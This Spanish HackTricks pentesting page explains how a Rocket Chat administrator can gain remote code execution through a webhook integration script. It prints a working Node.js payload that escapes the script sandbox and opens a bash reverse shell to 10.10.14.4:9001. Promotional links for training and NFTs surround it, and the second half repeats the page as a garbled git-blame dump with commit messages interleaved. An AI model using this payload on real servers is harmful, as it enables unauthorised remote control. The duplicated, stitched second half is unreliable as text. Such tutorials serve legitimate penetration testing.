hacktricks/network-services-pentesting/pentesting-web/rocket-chat.md

# Rocket Chat

<details>

<summary><strong>Aprende hacking de AWS desde cero hasta experto con</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>

Otras formas de apoyar a HackTricks:

* Si quieres ver tu **empresa anunciada en HackTricks** o **descargar HackTricks en PDF** Consulta los [**PLANES DE SUSCRIPCIÓN**](https://github.com/sponsors/carlospolop)!
* Obtén la [**merchandising oficial de PEASS & HackTricks**](https://peass.creator-spring.com)
* Descubre [**La Familia PEASS**](https://opensea.io/collection/the-peass-family), nuestra colección exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Únete al** 💬 [**grupo de Discord**](https://discord.gg/hRep4RUj7f) o al [**grupo de telegram**](https://t.me/peass) o **síguenos** en **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **Comparte tus trucos de hacking enviando PRs a los** [**HackTricks**](https://github.com/carlospolop/hacktricks) y [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repositorios de github.

</details>

<figure><img src="/.gitbook/assets/WebSec_1500x400_10fps_21sn_lightoptimized_v2.gif" alt=""><figcaption></figcaption></figure>

{% embed url="https://websec.nl/" %}


## RCE

Si eres administrador dentro de Rocket Chat puedes obtener RCE.

* Ve a **`Integrations`** y selecciona **`Nueva Integración`** y elige cualquiera: **`Incoming WebHook`** o **`Outgoing WebHook`**.
* `/admin/integrations/incoming`

<figure><img src="../../.gitbook/assets/image (263).png" alt=""><figcaption></figcaption></figure>

* Según la [documentación](https://docs.rocket.chat/guides/administration/admin-panel/integrations), ambos utilizan ES2015 / ECMAScript 6 ([básicamente JavaScript](https://codeburst.io/javascript-wtf-is-es6-es8-es-2017-ecmascript-dca859e4821c)) para procesar los datos. Así que obtengamos un [rev shell para javascript](../../generic-methodologies-and-resources/shells/linux.md#nodejs) como:
```javascript
const require = console.log.constructor('return process.mainModule.require')();
const { exec } = require('child_process');
exec("bash -c 'bash -i >& /dev/tcp/10.10.14.4/9001 0>&1'")
```
* Configurar el WebHook (el canal y publicar como nombre de usuario deben existir):

<figure><img src="../../.gitbook/assets/image (902).png" alt=""><figcaption></figcaption></figure>

* Configurar el script del WebHook:

<figure><img src="../../.gitbook/assets/image (569).png" alt=""><figcaption></figcaption></figure>

* Guardar cambios
* Obtener la URL del WebHook generada:

<figure><img src="../../.gitbook/assets/image (934).png" alt=""><figcaption></figcaption></figure>

* Llámalo con curl y deberías recibir la rev shell


<figure><img src="/.gitbook/assets/WebSec_1500x400_10fps_21sn_lightoptimized_v2.gif" alt=""><figcaption></figcaption></figure>

{% embed url="https://websec.nl/" %}

<details>

<summary><strong>Aprende hacking en AWS de cero a héroe con</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>

Otras formas de apoyar a HackTricks:

* Si deseas ver tu **empresa anunciada en HackTricks** o **descargar HackTricks en PDF** Consulta los [**PLANES DE SUSCRIPCIÓN**](https://github.com/sponsors/carlospolop)!
* Obtén la [**merchandising oficial de PEASS & HackTricks**](https://peass.creator-spring.com)
* Descubre [**The PEASS Family**](https://opensea.io/collection/the-peass-family), nuestra colección exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Únete al** 💬 [**grupo de Discord**](https://discord.gg/hRep4RUj7f) o al [**grupo de telegram**](https://t.me/peass) o **síguenos** en **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **Comparte tus trucos de hacking enviando PRs a los repositorios de** [**HackTricks**](https://github.com/carlospolop/hacktricks) y [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud).

</details>
Translated ['backdoors/salseo.md', 'macos-hardening/macos-red-teaming/RE 2023-08-15 18:30:10 +00:00			`# Rocket Chat`

			`<details>`

Translated ['binary-exploitation/rop-return-oriented-programing/ret2lib/ 2024-04-07 22:57:37 +00:00			`<summary><strong>Aprende hacking de AWS desde cero hasta experto con</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>`
Translated ['backdoors/salseo.md', 'macos-hardening/macos-red-teaming/RE 2023-08-15 18:30:10 +00:00
Translated ['network-services-pentesting/pentesting-web/README.md', 'net 2023-12-31 02:48:25 +00:00			`Otras formas de apoyar a HackTricks:`

Translated ['network-services-pentesting/11211-memcache/README.md', 'net 2024-02-09 08:54:51 +00:00			`* Si quieres ver tu empresa anunciada en HackTricks o descargar HackTricks en PDF Consulta los [PLANES DE SUSCRIPCIÓN](https://github.com/sponsors/carlospolop)!`
Translated ['binary-exploitation/rop-return-oriented-programing/ret2lib/ 2024-04-07 22:57:37 +00:00			`* Obtén la [merchandising oficial de PEASS & HackTricks](https://peass.creator-spring.com)`
			`* Descubre [La Familia PEASS](https://opensea.io/collection/the-peass-family), nuestra colección exclusiva de [NFTs](https://opensea.io/collection/the-peass-family)`
			`* Únete al 💬 [grupo de Discord](https://discord.gg/hRep4RUj7f) o al [grupo de telegram](https://t.me/peass) o síguenos en Twitter 🐦 [@carlospolopm](https://twitter.com/hacktricks\_live).`
Translated ['network-services-pentesting/11211-memcache/README.md', 'net 2024-02-09 08:54:51 +00:00			`* Comparte tus trucos de hacking enviando PRs a los [HackTricks](https://github.com/carlospolop/hacktricks) y [HackTricks Cloud](https://github.com/carlospolop/hacktricks-cloud) repositorios de github.`
Translated ['backdoors/salseo.md', 'macos-hardening/macos-red-teaming/RE 2023-08-15 18:30:10 +00:00
			`</details>`

Translated ['binary-exploitation/rop-return-oriented-programing/ret2lib/ 2024-04-07 22:57:37 +00:00			`<figure><img src="/.gitbook/assets/WebSec_1500x400_10fps_21sn_lightoptimized_v2.gif" alt=""><figcaption></figcaption></figure>`

			`{% embed url="https://websec.nl/" %}`


f 2023-06-05 18:33:24 +00:00			`## RCE`

Translated ['network-services-pentesting/11211-memcache/README.md', 'net 2024-02-09 08:54:51 +00:00			`Si eres administrador dentro de Rocket Chat puedes obtener RCE.`
f 2023-06-05 18:33:24 +00:00
Translated ['binary-exploitation/rop-return-oriented-programing/ret2lib/ 2024-04-07 22:57:37 +00:00			* Ve a `Integrations` y selecciona `Nueva Integración` y elige cualquiera: `Incoming WebHook` o `Outgoing WebHook`.
Translated ['backdoors/salseo.md', 'macos-hardening/macos-red-teaming/RE 2023-08-15 18:30:10 +00:00			* `/admin/integrations/incoming`
f 2023-06-05 18:33:24 +00:00
Translated ['binary-exploitation/rop-return-oriented-programing/ret2lib/ 2024-04-07 22:57:37 +00:00			`<figure><img src="../../.gitbook/assets/image (263).png" alt=""><figcaption></figcaption></figure>`
f 2023-06-05 18:33:24 +00:00
Translated ['network-services-pentesting/11211-memcache/README.md', 'net 2024-02-09 08:54:51 +00:00			`* Según la [documentación](https://docs.rocket.chat/guides/administration/admin-panel/integrations), ambos utilizan ES2015 / ECMAScript 6 ([básicamente JavaScript](https://codeburst.io/javascript-wtf-is-es6-es8-es-2017-ecmascript-dca859e4821c)) para procesar los datos. Así que obtengamos un [rev shell para javascript](../../generic-methodologies-and-resources/shells/linux.md#nodejs) como:`
f 2023-06-05 18:33:24 +00:00			```javascript
			`const require = console.log.constructor('return process.mainModule.require')();`
			`const { exec } = require('child_process');`
			`exec("bash -c 'bash -i >& /dev/tcp/10.10.14.4/9001 0>&1'")`
			```
Translated ['binary-exploitation/rop-return-oriented-programing/ret2lib/ 2024-04-07 22:57:37 +00:00			`* Configurar el WebHook (el canal y publicar como nombre de usuario deben existir):`
f 2023-06-05 18:33:24 +00:00
Translated ['binary-exploitation/rop-return-oriented-programing/ret2lib/ 2024-04-07 22:57:37 +00:00			`<figure><img src="../../.gitbook/assets/image (902).png" alt=""><figcaption></figcaption></figure>`
f 2023-06-05 18:33:24 +00:00
Translated ['network-services-pentesting/11211-memcache/README.md', 'net 2024-02-09 08:54:51 +00:00			`* Configurar el script del WebHook:`
f 2023-06-05 18:33:24 +00:00
Translated ['binary-exploitation/rop-return-oriented-programing/ret2lib/ 2024-04-07 22:57:37 +00:00			`<figure><img src="../../.gitbook/assets/image (569).png" alt=""><figcaption></figcaption></figure>`
f 2023-06-05 18:33:24 +00:00
Translated ['network-services-pentesting/11211-memcache/README.md', 'net 2024-02-09 08:54:51 +00:00			`* Guardar cambios`
			`* Obtener la URL del WebHook generada:`
f 2023-06-05 18:33:24 +00:00
Translated ['binary-exploitation/rop-return-oriented-programing/ret2lib/ 2024-04-07 22:57:37 +00:00			`<figure><img src="../../.gitbook/assets/image (934).png" alt=""><figcaption></figcaption></figure>`

			`* Llámalo con curl y deberías recibir la rev shell`


			`<figure><img src="/.gitbook/assets/WebSec_1500x400_10fps_21sn_lightoptimized_v2.gif" alt=""><figcaption></figcaption></figure>`
f 2023-06-05 18:33:24 +00:00
Translated ['binary-exploitation/rop-return-oriented-programing/ret2lib/ 2024-04-07 22:57:37 +00:00			`{% embed url="https://websec.nl/" %}`
Translated ['backdoors/salseo.md', 'macos-hardening/macos-security-and-p 2023-06-13 16:46:57 +00:00
			`<details>`

Translated ['binary-exploitation/rop-return-oriented-programing/ret2lib/ 2024-04-07 22:57:37 +00:00			`<summary><strong>Aprende hacking en AWS de cero a héroe con</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>`
Translated ['network-services-pentesting/pentesting-web/README.md', 'net 2023-12-31 02:48:25 +00:00
			`Otras formas de apoyar a HackTricks:`
Translated ['backdoors/salseo.md', 'macos-hardening/macos-security-and-p 2023-06-13 16:46:57 +00:00
Translated ['network-services-pentesting/11211-memcache/README.md', 'net 2024-02-09 08:54:51 +00:00			`* Si deseas ver tu empresa anunciada en HackTricks o descargar HackTricks en PDF Consulta los [PLANES DE SUSCRIPCIÓN](https://github.com/sponsors/carlospolop)!`
			`* Obtén la [merchandising oficial de PEASS & HackTricks](https://peass.creator-spring.com)`
			`* Descubre [The PEASS Family](https://opensea.io/collection/the-peass-family), nuestra colección exclusiva de [NFTs](https://opensea.io/collection/the-peass-family)`
Translated ['binary-exploitation/rop-return-oriented-programing/ret2lib/ 2024-04-07 22:57:37 +00:00			`* Únete al 💬 [grupo de Discord](https://discord.gg/hRep4RUj7f) o al [grupo de telegram](https://t.me/peass) o síguenos en Twitter 🐦 [@carlospolopm](https://twitter.com/hacktricks\_live).`
Translated ['network-services-pentesting/11211-memcache/README.md', 'net 2024-02-09 08:54:51 +00:00			`* Comparte tus trucos de hacking enviando PRs a los repositorios de [HackTricks](https://github.com/carlospolop/hacktricks) y [HackTricks Cloud](https://github.com/carlospolop/hacktricks-cloud).`
Translated ['backdoors/salseo.md', 'macos-hardening/macos-security-and-p 2023-06-13 16:46:57 +00:00
			`</details>`